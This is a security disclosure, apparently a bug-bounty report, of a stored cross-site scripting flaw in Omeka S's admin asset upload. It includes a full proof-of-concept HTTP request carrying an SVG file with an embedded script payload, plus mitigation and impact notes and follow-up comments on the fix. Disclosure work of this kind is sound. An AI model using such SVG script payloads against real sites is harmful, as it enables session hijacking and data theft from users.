Stored XSS via SVG Upload in omeka/omeka-s
Reported on
Jul 16th 2023
Description
By uploading an SVG file containing JavaScript code in the file upload function on the administrator screen, it is possible to execute any script on the browser of the accessing user.
Proof of Concept
Log in to the administrator screen, access the Assets page, and upload the SVG file.
Request
POST /admin/asset/add HTTP/1.1
...
-----------------------------32482956685473744651320483298
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------32482956685473744651320483298
...
Execution Result
http://localhost/files/asset/d6dbbeb510abf7a3498c0b8dbdbb61738a91ab06.svg
PoC Video
https://drive.google.com/file/d/1egSGIfDD9ZTitGCb9-bLVZmPdMqUPPyK/view?usp=sharing
Measures
Always filter files, limit the content type of uploaded files, and properly sanitize content.
Impact
Stored XSS vulnerabilities can lead to data theft, account compromise, and the distribution of malware.
Attackers can inject malicious scripts into a website, allowing them to steal sensitive information or hijack user sessions.
Additionally, stored XSS can result in website defacement and content manipulation, causing reputational damage.
It can also be used as a platform for launching phishing attacks, tricking users into revealing their credentials or sensitive data.
Thank you for reviewing and approving my report. I will continue to wait for requests for fixes and CVEs.
@zerocrates Thanks for the fix and pull merge. Could you please submit a corrected mark and CVE assignment request?